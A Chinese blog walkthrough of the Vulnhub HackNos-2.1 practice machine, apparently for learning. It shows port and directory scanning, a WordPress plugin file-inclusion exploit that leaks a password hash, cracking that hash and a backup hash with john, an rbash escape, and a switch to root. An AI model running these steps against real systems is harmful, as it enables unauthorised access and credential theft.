Vulnhub——HackNos-2.1

已于 2024-01-09 16:25:59 修改
阅读量116 收藏
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-06-15 20:02:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/131226765
版权

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/hacknos/Os-hackNos-2.1.ova

Vulnhub靶机安装:

0.靶机配置

将下载下来的靶机文件Os-hackNos-2.1.ova导入到vm中

 

导入后,因为无法获取ip地址,故需要进行设置配置

需要在启动界面点击shift进入如下界面按下e

 

向下翻动,将ro改为rw single init=/bin/bash

然后按下 ctrl+x进入shell

使用ip a查看网卡名

使用 :q退出后

使用vim /etc/netplan/50-cloud-init.yaml进行编辑,此处将错误的网卡改为ens33

1.信息收集

1.1主机发现

在kali里使用netdiscover发现主机

攻击机机:kali IP :192.168.245.129 靶机IP :192.168.245.132

1.2查看端口

nmap -sV -p- 192.168.245.132

 可以发现开启了22端口和80端口

先访问一下80端口:http://192.168.245.132:80 熟悉以下界面

 1.3目录扫描

dirb http://192.168.245.132

 访问:http://192.168.245.132/tsweb/

 

使用WpScan 扫描一下后台 发现了一个插件 searchsploit搜索我们本地漏洞库看看有没有漏洞

  • -e是表示开启枚举模式,
  • p是代表枚举所有的插件(plugins)
wpscan --url http://192.168.245.132/tsweb -e p

2.漏洞利用 

2.1从kali上搜索本地是否存在gracemedia-media-player插件的poc

searchsploit gracemedia
cat /usr/share/exploitdb/exploits/php/webapps/46537.txt

 

 可以看到有这么一行

flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash 

 2.2接下来我们破解flag的密码
kali执行如下命令:

echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/' > 1.txt 
gunzip /usr/share/wordlists/rockyou.txt.gz
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt --format=md5crypt

2.3ssh登陆

ssh flag@192.168.245.132
密码:topsecret


cat /etc/passwd | grep bash

 发现并没有可以利用的 ,因此需要要换个思路,可能存在什么备份文件之类的 ,passwd文件中有一个叫rohit的用户,发现没有权限。

 

可以看到我们当前的flag用户是一个rbash权限,比较低,所以执行不了cd命令,我们输入sh重新启动一个标准shell即可
然后输入:

sh
cd /var/backups/passbkp  //这里存放着密码备份信息

进入sh 查看备份文件里面的md5-hash 复制出来使用john再次进行爆破

 获得密码 !%hack41

 sudo su 提权

su rohit
密码:!%hack41

 家目录下的txt文件即我们最终获取文件

cd ~
ls
cat root.txt

 至此获取到了flag,渗透测试结束。

廾匸0705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
看完这篇 教你玩转渗透测试靶机vulnhub——HackNos-2.1
Aluxian_的博客
10-22 1182
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。1.信息收集,端口扫描2.文件包含的利用3.john爆破获取密码4.Sudo su提权这个靶机比较简单啦 希望对刚入门得小白有帮助!🙂最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3170
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
Vulnhub--OS-HACKNOS-2.1
流水不争先,争的是滔滔不绝
06-22 510
(1)wpsacn扫描wordpress站点;(2)以root权限进行su切换root用户时,无需输入root密码
Vulnhub实战——Os-hackNos-2.1
m0_63200360的博客
06-07 106
在查看目录中 发现个文件cat /var/backups/passbkp/md5-hash,$1$ 怀疑是rohit的密码,使用su切换到rohit用户,切换/home目录下的rohit用户的家目录下查看user.txt文件。查看除了root还有什么用户拥有管理员权限,这里看到还有个rohit用户是拥有管理员权限的。打开靶机,扫描内网存活的主机,这里靶机的IP为192.168.27.142。查看到flag用户的加密值,保存到文件中,使用john工具进行爆破。本人为新手,发文章只是记录学习笔记,大佬勿喷。
OS-HACKNOS-2.1
最新发布
m0_60894143的博客
07-08 271
在备份文件/var/backups/passbkp中成功找到rohit用户的密码$1$rohit$01Dl0NQKtgfeL08fGrggi0。通过sudo -l可以看到所有的权限,直接用sudo su就可以切换到root。#flag用户的shell是rbash shell,需要提升shell权限。常规信息收集不具备提权条件,进行备份文件的查找或者上传内核漏洞检测脚本。利用wpscan进行漏洞扫描 #扫描所有插件。存在文件包含漏洞,这里查看到。确定为wordpress站。扫描靶机开放端口信息。
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机 Hacknos:2.1
m0_51811529的博客
08-30 144
靶机2.1
靶机Hacknos-2.1
weixin_50815573的博客
02-21 1317
靶机地址 https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/# 目标为 普通用户的user.txt和root用户的root.txt 第一步现将我们下载好的靶机导入到VirtualBox中启动靶机 第二步,打开我们的kali 使用 nmap -sP 192.168.1.0/24 搜索内网或者的主机 找到我们的目标靶机ip, 这里有个技巧,通过VirtualBox >>设置 >>网络 >> 高.
VulnHub—Os-hackNos-2.1
weixin_39219503的博客
12-27 589
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/ 题目信息如下,难度中等偏下,需要获取俩个flag Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : Web Applicati...
VulnHub』hackNos: Os-hackNos-2.1-Walkthrough
ins1ght的博客
02-15 1281
LFI漏洞、rbash逃逸
VulnHub—DC-1
weixin_39219503的博客
01-29 226
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-1,292/ 题目信息如下,环境中有flag文件,里面有hint DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. ...
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2446
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
VulnHub靶场渗透之Gigachad
weixin_42075643的博客
03-16 1613
VulnHub是一个有趣的靶场合集,里边有不同种类的漏洞模拟,初学者可以从中学到很多基础漏洞,是一个很不错的平台。 今天学习玩玩Gigachad 下载地址:http://www.vulnhub.com/entry/gigachad-1,657/ 推荐使用virtualBox,我这里是VMware,看自己条件使用 这里VMware需要设置 一下,不然没法联网 导入后开启: 在这个界面按e键; 这里看清楚修改位置, 将ro修改为: rw signie init=/bin/bash 按F10: 输入ip
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值